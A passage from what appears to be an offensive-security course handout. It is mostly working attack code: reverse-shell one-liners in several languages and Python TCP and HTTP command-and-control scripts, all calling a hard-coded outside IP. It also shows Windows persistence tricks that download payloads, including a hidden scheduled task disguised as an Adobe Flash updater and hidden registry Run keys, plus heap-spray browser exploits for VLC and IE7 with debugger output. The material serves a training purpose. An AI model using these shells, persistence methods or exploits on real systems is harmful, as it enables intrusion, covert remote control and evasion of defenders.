  2627. ****** Note /dev/tcp is usually in Red Hat derivatives and NOT Debian derivatives you want to try /proc/net/tcp instead ***
  2628.  
  2629.  
  2630. ########
  2631. # Perl #
  2632. ########
  2633.  
  2634. ---------------------------Type This-----------------------------------
  2635.  
  2636.  
  2637. perl -e 'use Socket;$i="45.32.211.184";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  2638.  
  2639. ----------------------------------------------------------------------
  2640.  
  2641.  
  2642.  
  2643.  
  2644.  
  2645. ----------------------------------------------------------------------
  2646. cat perlbackdoor.pl
  2647. #!/usr/bin/perl
  2648. use Socket;
  2649. use FileHandle;
  2650. $IP = $ARGV[0];
  2651. $PORT = $ARGV[1];
  2652. socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
  2653. connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
  2654. SOCKET->autoflush();
  2655. open(STDIN, ">&SOCKET");
  2656. open(STDOUT,">&SOCKET");
  2657. open(STDERR,">&SOCKET");
  2658. system("/bin/sh -i");
  2659.  
  2660. ----------------------------------------------------------------------
  2661.  
  2662. ##########
  2663. # Python #
  2664. ##########
  2665.  
  2666. ---------------------------Type This-----------------------------------
  2667.  
  2668. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.32.211.184",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  2669.  
  2670. ----------------------------------------------------------------------
  2671.  
  2672.  
  2673.  
  2674. #######
  2675. # Php #
  2676. #######
  2677. ---------------------------Type This-----------------------------------
  2678.  
  2679. php -r '$sock=fsockopen("45.32.211.184",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  2680.  
  2681. ----------------------------------------------------------------------
  2682.  
  2683.  
  2684.  
  2685. ########
  2686. # ruby #
  2687. ########
  2688. ---------------------------Type This-----------------------------------
  2689.  
  2690. ruby -rsocket -e'f=TCPSocket.open("45.32.211.184",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  2691.  
  2692. ----------------------------------------------------------------------
  2693.  
  2694.  
  2695. ########
  2696. # Java #
  2697. ########
  2698. ---------------------------Type This-----------------------------------
  2699.  
  2700. r = Runtime.getRuntime()
  2701. p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/45.32.211.184/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
  2702. p.waitFor()
  2703.  
  2704.  
  2705. exec 5<>/dev/tcp/45.32.211.184/1234
  2706.  
  2707.  
  2708. cat <&5 | while read line; do $line 2>&5 >&5; done
  2709.  
  2710. exec 5<>/dev/tcp/45.32.211.184/1234
  2711.  
  2712. while read line 0<&5; do $line 2>&5 >&5; done
  2713. 0<&196;exec 196<>/dev/tcp/45.32.211.184/1234; sh <&196 >&196 2>&196
  2714.  
  2715. ----------------------------------------------------------------------
  2716. ****** Note /dev/tcp is usually in Red Hat derivatives and NOT Debian derivatives you want to try /proc/net/tcp instead ***
  2717.  
  2718.  
  2719.  
  2720.  
  2721.  
  2722.  
  2723.  
  2724.  
  2725. ##############
  2726. # Powershell #
  2727. ##############
  2728. ---------------------------Type This-----------------------------------
  2729.  
  2730. powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()}; if ($process.ExitCode -ne $null) {$process.Close()}; exit; };$address = '45.32.211.184'; $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize ;$process = New-Object System.Diagnostics.Process ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' ;$process.StartInfo.RedirectStandardInput = 1 ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0 ;$process.Start() ;$inputstream = $process.StandardInput ;$outputstream = $process.StandardOutput ;Start-Sleep 1 ;$encoding = new-object System.Text.AsciiEncoding ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length) ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup} ;$pos = 0; $i = 1; while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos); $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos); $inputstream.write($string); start-sleep 1; if ($process.ExitCode -ne $null) {ReverseShellClean}else { $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){; $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}; $stream.Write($encoding.GetBytes($out),0,$out.length); $out = $null; $string = $null}} else {ReverseShellClean}};"
  2731.  
  2732.  
  2733. ----------------------------------------------------------------------
  2734.  
  2735. **** This shell has been VERY VERY VERY flaky for me - maybe you can figure out what is wrong *****
  2736.  
  2737.  
  2738. ###############################
  2739. # Reverse Shell in Python 2.7 #
  2740. ###############################
  2741.  
  2742. We'll create 2 python files. One for the server and one for the client.
  2743.  
  2744. - Below is the python code that is running on victim/client Windows machine:
  2745.  
  2746. ---------------------------Paste This-----------------------------------
  2747.  
  2748. # Client
  2749.  
  2750. import socket # For Building TCP Connection
  2751. import subprocess # To start the shell in the system
  2752.  
  2753. def connect():
  2754. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  2755. s.connect(('45.32.211.184',8080))
  2756.  
  2757. while True: #keep receiving commands
  2758. command = s.recv(1024)
  2759.  
  2760. if 'terminate' in command:
  2761. s.close() #close the socket
  2762. break
  2763.  
  2764. else:
  2765.  
  2766. CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  2767. s.send( CMD.stdout.read() ) # send the result
  2768. s.send( CMD.stderr.read() ) # incase you mistyped a command.
  2769. # we will send back the error
  2770.  
  2771. def main ():
  2772. connect()
  2773. main()
  2774.  
  2775.  
  2776. ----------------------------------------------------------------------
  2777.  
  2778. - Below is the code that we should run on server unit, in our case InfosecAddicts Ubuntu machine ( Ubuntu IP: 45.32.211.184 )
  2779.  
  2780. ---------------------------Paste This-----------------------------------
  2781.  
  2782. # Server
  2783.  
  2784. import socket # For Building TCP Connection
  2785.  
  2786.  
  2787. def connect ():
  2788.  
  2789. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  2790. s.bind(("45.32.211.184", 8080))
  2791. s.listen(1)
  2792. conn, addr = s.accept()
  2793. print '[+] We got a connection from: ', addr
  2794.  
  2795.  
  2796. while True:
  2797. command = raw_input("Shell> ")
  2798.  
  2799. if 'terminate' in command:
  2800. conn.send('termminate')
  2801. conn.close() # close the connection with host
  2802. break
  2803.  
  2804. else:
  2805. conn.send(command) #send command
  2806. print conn.recv(1024)
  2807.  
  2808. def main ():
  2809. connect()
  2810. main()
  2811.  
  2812. ----------------------------------------------------------------------
  2813.  
  2814. - First run server.py code from Ubuntu machine. From command line type:
  2815.  
  2816. ---------------------------Type This-----------------------------------
  2817.  
  2818. python server.py
  2819.  
  2820. ----------------------------------------------------------------------
  2821.  
  2822. - then check if 8080 port is open, and if we are listening on 8080:
  2823.  
  2824. ---------------------------Type This-----------------------------------
  2825.  
  2826. netstat -antp | grep "8080"
  2827.  
  2828. ----------------------------------------------------------------------
  2829.  
  2830. - Then on victim ( Windows ) unit run client.py code.
  2831.  
  2832.  
  2833. - Connection will be established, and you will get a shell on Ubuntu:
  2834.  
  2835. ---------------------------Type This-----------------------------------
  2836.  
  2837. python server.py
  2838. [+] We got a connection from: ('192.168.243.1', 56880)
  2839. Shell> arp -a
  2840.  
  2841. Shell> ipconfig
  2842.  
  2843. Shell> dir
  2844. ----------------------------------------------------------------------
  2845.  
  2846.  
  2847. ##########################################
  2848. # HTTP based reverse shell in Python 2.7 #
  2849. ##########################################
  2850.  
  2851.  
  2852. - The easiest way to install python modules and keep them up-to-date is with a Python-based package manager called Pip
  2853. - Download get-pip.py from https://bootstrap.pypa.io/get-pip.py on your Windows machine
  2854.  
  2855. Then run python get-pip.py from command line. Once pip is installed you may use it to install packages.
  2856.  
  2857. - Install requests package:
  2858. ---------------------------Type This-----------------------------------
  2859.  
  2860. python -m pip install requests
  2861.  
  2862. ----------------------------------------------------------------------
  2863.  
  2864. - Copy and paste below code into client_http.py on your Windows machine:
  2865.  
  2866. - In my case server/ubuntu IP is 45.32.211.184. You need to change IP to your server address, in both codes (client_http.py, server_HTTP.py)
  2867.  
  2868. ---------------------------Paste This-----------------------------------
  2869. # Client
  2870.  
  2871. import requests
  2872. import subprocess
  2873. import time
  2874.  
  2875.  
  2876. while True:
  2877. req = requests.get('http://45.32.211.184')
  2878. command = req.text
  2879.  
  2880. if 'terminate' in command:
  2881. break
  2882.  
  2883. else:
  2884. CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  2885. post_response = requests.post(url='http://45.32.211.184', data=CMD.stdout.read() )
  2886. post_response = requests.post(url='http://45.32.211.184', data=CMD.stderr.read() )
  2887.  
  2888. time.sleep(3)
  2889.  
  2890.  
  2891.  
  2892.  
  2893. ----------------------------------------------------------------------
  2894.  
  2895.  
  2896.  
  2897. - Copy and paste below code into server_HTTP.py on your Ubuntu unit (server):
  2898.  
  2899.  
  2900. ---------------------------Paste This-----------------------------------
  2901.  
  2902. import BaseHTTPServer
  2903. HOST_NAME = '45.32.211.184'
  2904. PORT_NUMBER = 80
  2905. class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  2906.  
  2907. def do_GET(s):
  2908. command = raw_input("Shell> ")
  2909. s.send_response(200)
  2910. s.send_header("Content-type", "text/html")
  2911. s.end_headers()
  2912. s.wfile.write(command)
  2913.  
  2914.  
  2915. def do_POST(s):
  2916. s.send_response(200)
  2917. s.end_headers()
  2918. length = int(s.headers['Content-Length'])
  2919. postVar = s.rfile.read(length)
  2920. print postVar
  2921.  
  2922. if __name__ == '__main__':
  2923. server_class = BaseHTTPServer.HTTPServer
  2924. httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
  2925.  
  2926. try:
  2927. httpd.serve_forever()
  2928. except KeyboardInterrupt:
  2929. print'[!] Server is terminated'
  2930. httpd.server_close()
  2931.  
  2932. ----------------------------------------------------------------------
  2933.  
  2934. - run server_HTTP.py on Ubuntu with next command:
  2935.  
  2936. ---------------------------Type This-----------------------------------
  2937.  
  2938. sudo python server_HTTP.py
  2939.  
  2940. ----------------------------------------------------------------------
  2941.  
  2942.  
  2943. - on Windows machine run client_http.py
  2944.  
  2945. - on Ubuntu you will see that connection is established:
  2946.  
  2947. ---------------------------Type This-----------------------------------
  2948.  
  2949. sudo python server_HTTP.py
  2950. Shell> dir
  2951. -----------------------------------------------------------------------
  2952.  
  2953.  
  2954.  
  2955.  
  2956.  
  2957.  
  2958. ###############################
  2959. # Device Guard Check & Bypass #
  2960. ###############################
  2961. https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-OSiRis.ps1
  2962.  
  2963.  
  2964. ######################
  2965. # EDR Check & Bypass #
  2966. ######################
  2967. https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-EDRCheck.ps1
  2968.  
  2969.  
  2970.  
  2971.  
  2972. ###############
  2973. # Persistance #
  2974. ###############
  2975.  
  2976.  
  2977. ---- Scheduled Task Based Persistance ----
  2978. 1. Scheduled task based on most commonly occuring event ID
  2979. https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1
  2980.  
  2981.  
  2982.  
  2983. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  2984.  
  2985. ---------------------------Type This-----------------------------------
  2986. mkdir c:\persistance
  2987.  
  2988. cd c:\persistance
  2989.  
  2990. (new-object System.Net.WebClient).DownloadFile("https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1", "c:\persistance\user_event_persistence.ps1")
  2991.  
  2992. .\user_event_persistence.ps1
  2993. -------------------------------------------------------------------------
  2994.  
  2995.  
  2996.  
  2997. - Alternative method:
  2998. --------------------
  2999. In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml"
  3000.  
  3001. - Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on target machine:
  3002. - adapt <UserId></UserId> to SID of current user if you do not have administrative privileges (wmic useraccount where name='user' get sid)
  3003. - adapt <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable
  3004. - this scheduled task triggers on a event, can be changed to regular calls (e.g. once an hour)
  3005.  
  3006. --------------------------------
  3007. <?xml version="1.0" encoding="UTF-16"?>
  3008. <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  3009. <RegistrationInfo>
  3010. <Author>Adobe Systems Incorporated</Author>
  3011. <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>
  3012. </RegistrationInfo>
  3013. <Triggers>
  3014. <EventTrigger>
  3015. <Enabled>true</Enabled>
  3016. <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  3017. </EventTrigger>
  3018. </Triggers>
  3019. <Principals>
  3020. <Principal id="Author">
  3021. <UserId>S-1-5-18</UserId>
  3022. <RunLevel>LeastPrivilege</RunLevel>
  3023. </Principal>
  3024. </Principals>
  3025. <Settings>
  3026. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
  3027. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
  3028. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
  3029. <AllowHardTerminate>true</AllowHardTerminate>
  3030. <StartWhenAvailable>true</StartWhenAvailable>
  3031. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
  3032. <IdleSettings>
  3033. <StopOnIdleEnd>true</StopOnIdleEnd>
  3034. <RestartOnIdle>false</RestartOnIdle>
  3035. </IdleSettings>
  3036. <AllowStartOnDemand>true</AllowStartOnDemand>
  3037. <Enabled>true</Enabled>
  3038. <Hidden>true</Hidden>
  3039. <RunOnlyIfIdle>false</RunOnlyIfIdle>
  3040. <WakeToRun>false</WakeToRun>
  3041. <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
  3042. <Priority>7</Priority>
  3043. </Settings>
  3044. <Actions Context="Author">
  3045. <Exec>
  3046. <Command>C:\Windows\System32\calc.exe</Command>
  3047. </Exec>
  3048. </Actions>
  3049. </Task>
  3050.  
  3051. ---------------------------
  3052.  
  3053. Now let's create the scheduled task
  3054. ---------------------------Type This-----------------------------------
  3055. schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"
  3056. -----------------------------------------------------------------------
  3057.  
  3058.  
  3059. Sit back and wait for the task to trigger. By the way we got the correct XML file format by creating a scheduled tasked and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.
  3060.  
  3061.  
  3062.  
  3063.  
  3064. ---- Registry Based Persistance ---
  3065. 1. RunOnce key persistance trick
  3066. Reference:
  3067. https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
  3068.  
  3069.  
  3070.  
  3071. 1. upload your executable to system
  3072. 2. add registry entry (requires admin privileges):
  3073. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 /v "Line1" /d "||c:\path\to\malicious.exe"
  3074.  
  3075. Note:
  3076. Beacon/Shell may prevent the user to login as he is hanging in the Beacon executable. Solution: spawn new beacon and exit initial beacon.
  3077.  
  3078.  
  3079.  
  3080.  
  3081.  
  3082. 2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS
  3083. Let's try this:
  3084. https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
  3085.  
  3086.  
  3087. 2. Hide Reg
  3088. Let's try this code out:
  3089. https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741
  3090.  
  3091. Reference:
  3092. https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
  3093.  
  3094.  
  3095.  
  3096.  
  3097. Get the following two files
  3098. ---------------------------
  3099. https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1
  3100. https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1
  3101.  
  3102. In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (ex: 'cmd /c calc.exe'). It will be invisible for regedit and powershell.
  3103.  
  3104. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  3105.  
  3106. ---------------------------Type This-----------------------------------
  3107. mkdir c:\persistance
  3108.  
  3109. cd c:\persistance
  3110.  
  3111. (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistance\PSReflect.ps1")
  3112.  
  3113. (new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistance\PSReflect-RegHide.ps1")
  3114.  
  3115. .\PSReflect-RegHide.ps1
  3116. -------------------------------------------------------------------------
  3117.  
  3118.  
  3119.  
  3120. Now, let's check to see if the newly created registry value is hidden. You can do this by typing the following:
  3121. ---------------------------Type This-----------------------------------
  3122. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  3123. Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
  3124. -----------------------------------------------------------------------
  3125. However, it will be visible e.g. for Sysinternals Autorun tool
  3126.  
  3127.  
  3128.  
  3129. 3. VShadow
  3130. Let's try this out:
  3131. https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/
  3132.  
  3133.  
  3134.  
  3135. 1. Download vshadow.exe including in the WinSDK
  3136. Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279
  3137. Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
  3138. 2. Upload the vshadow.exe to the target machine
  3139. 3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Reg Key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")
  3140.  
  3141.  
  3142. ---------------------------Type This-----------------------------------
  3143. mkdir c:\persistance
  3144.  
  3145. cd c:\persistance
  3146.  
  3147. (new-object System.Net.WebClient).DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe", "c:\persistance\vshadow.exe")
  3148.  
  3149. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistance\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"
  3150. -----------------------------------------------------------------------
  3151.  
  3152.  
  3153. 4. INF-SCT
  3154. Let's try this out:
  3155. https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  3156. https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  3157.  
  3158.  
  3159. Technique 1: CMSTP
  3160. ------------------
  3161. create "c:\persistance\cmstp.inf" with the following content:
  3162. -----------------------------------
  3163. ;cmstp.exe cmstp.inf
  3164.  
  3165. [version]
  3166. Signature=$chicago$
  3167. AdvancedINF=2.5
  3168.  
  3169. [DefaultInstall_SingleUser]
  3170. UnRegisterOCXs=UnRegisterOCXSection
  3171.  
  3172. [UnRegisterOCXSection]
  3173. %11%\scrobj.dll,NI,c:\persistance\test.sct
  3174.  
  3175. [Strings]
  3176. AppAct = "SOFTWARE\Microsoft\Connection Manager"
  3177. ServiceName="Yay"
  3178. ShortSvcName="Yay"
  3179. ----------------------------------------------------
  3180.  
  3181.  
  3182.  
  3183. get a sample sct payload (e.g. https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019) and store it in "c:\persistance\test.sct"
  3184.  
  3185.  
  3186. ---------------------------Type This-----------------------------------
  3187. mkdir c:\persistance
  3188.  
  3189. cd c:\persistance
  3190.  
  3191. (new-object System.Net.WebClient).DownloadFile("https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019", "c:\persistance\test.sct")
  3192.  
  3193. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d "\"C:\Windows\System32\cmstp.exe\" /s C:\persistance\cmstp.inf"
  3194. -----------------------------------------------------------------------
  3195.  
  3196.  
  3197. reboot your machine
  3198. your sct payload will be executed upon reboot. HOWEVER, as a Windows binary executes it, Sysinternals Autorun tool will not show it, unless you untick "Options->Hide Windows Entries" option
  3199.  
  3200.  
  3201.  
  3202. 5. GPScript.exe
  3203. Let's try this out:
  3204. https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
  3205.  
  3206.  
  3207.  
  3208. ---- Cobalt Strike Agressor Persistance Scripts ----
  3209. https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna
  3210. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna
  3211. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna
  3212.  
  3213.  
  3214.  
  3215.  
  3216.  
  3217.  
  3218.  
  3219.  
  3220.  
  3221. --------------------------------------------------------------------------------------------------------------------------
  3222.  
  3223.  
  3224. ####################
  3225. # Browser Exploits #
  3226. ####################
  3227.  
  3228. VLC smb:// exploit
  3229. ------------------
  3230.  
  3231. EXPLOIT VECTOR
  3232.  
  3233. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  3234.  
  3235. Exploit Scripts
  3236. - ffvlc
  3237.  
  3238. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  3239.  
  3240. perl daemon.py vlc0.html
  3241.  
  3242. ON YOUR XPIE8 VM, START FIREFOX
  3243. Browse to http://your_host_ip_address:8080/
  3244.  
  3245. vlc0.html
  3246. ---------
  3247. <script>
  3248. var buf = "";
  3249. for(i = 0; i < 1250; i++)
  3250. buf += unescape("%41%41%41%41");
  3251. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  3252. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  3253. </script>
  3254.  
  3255. vlc1.html
  3256. ---------
  3257. <script>
  3258.  
  3259. // shellcode created in heap memory
  3260. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  3261.  
  3262. // 800K block of NOPS
  3263. var nop = unescape("%u9090%u09090"); // 4 NOPS
  3264. while(nop.length < 0xc0000) {
  3265. nop += nop;
  3266. }
  3267.  
  3268. // spray the heap with NOP+shellcode
  3269. var memory = new Array();
  3270. for(i = 0; i < 50; i++) {
  3271. memory[i] = nop + shellcode;
  3272. }
  3273.  
  3274. // build the exploit payload
  3275. var buf = "";
  3276. for(i = 0; i < 1250; i++)
  3277. buf += unescape("%41%41%41%41");
  3278. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  3279.  
  3280. // trigger the exploit
  3281. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  3282. </script>
  3283.  
  3284. perl daemon.py vlc1.html
  3285.  
  3286. Search for where our NOPS+shellcode lies in the heap
  3287.  
  3288. s 0 l fffffff 90 90 90 90 cc cc cc cc
  3289.  
  3290. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  3291. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3292. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3293. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3294. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3295. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3296. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3297. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3298. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3299. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3300. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3301. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3302. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3303. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3304. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3305. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3306. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  3307.  
  3308. Edit vlc2.html
  3309. replace %41%41%41%41 with %07%07%07%07
  3310.  
  3311. (928.fd0): Break instruction exception - code 80000003 (first chance)
  3312. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  3313. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  3314. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  3315. 07100000 cc int 3
  3316. 0:019> u
  3317. 07100000 cc int 3
  3318. 07100001 cc int 3
  3319. 07100002 cc int 3
  3320. 07100003 cc int 3
  3321. 07100004 cc int 3
  3322. 07100005 cc int 3
  3323. 07100006 cc int 3
  3324. 07100007 cc int 3
  3325.  
  3326. Create vlc3.html (Copy vlc2.html to vlc3.html)
  3327. ----------------------------------------------
  3328. Win32 Reverse Shell
  3329. - no restricted characters
  3330. - Encoder NONE
  3331. - use the Javascript encoded payload generated by msfweb
  3332.  
  3333. USE AFTER FREE
  3334. --------------
  3335.  
  3336. struct {
  3337. int a;
  3338. int b;
  3339. void (*add)();
  3340. char c[20];
  3341. } s1, s2;
  3342.  
  3343. s1.a = 3;
  3344. s1.b = 4;
  3345. s1.add = my_add_func();
  3346. strcpy(s1.c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAA");
  3347. :
  3348. :
  3349. s2.add(x, y);
  3350. :
  3351.  
  3352. Exploit scripts
  3353. ie7-ms09002
  3354.  
  3355. perl daemon.py ie7imgtag0.html
  3356.  
  3357. First chance exceptions are reported before any exception handling.
  3358. This exception may be expected and handled.
  3359. eax=025445a0 ebx=00000000 ecx=4141ffff edx=00000002 esi=02545678 edi=80020003
  3360. eip=7e8999cb esp=01e8f68c ebp=01e8f694 iopl=0 nv up ei pl nz na po nc
  3361. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  3362. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Internet Explorer Collection\IE700\mshtml.dll -
  3363. mshtml!DllGetClassObject+0x4ec28:
  3364. 7e8999cb ff5104 call dword ptr [ecx+4] ds:0023:41420003=????????
  3365.  
  3366. WHENEVER YOU HAVE A CRASH WHERE YOU FAULT ON:
  3367.  
  3368. call dword ptr [reg + N]
  3369.  
  3370. You control the reg value (completely or partially)
  3371.  
  3372. You have an exploitable vtable overwrite.
  3373.  
  3374. u eip-3 <--- check 3 instructions before the crash
  3375. 0:005> u eip-3
  3376. mshtml!DllGetClassObject+0x4ec25:
  3377. 7e8999c8 8b08 mov ecx,dword ptr [eax]
  3378. 7e8999ca 50 push eax
  3379. 7e8999cb ff5104 call dword ptr [ecx+4]
  3380.  
  3381. dd eax
  3382. 0:005> dd eax
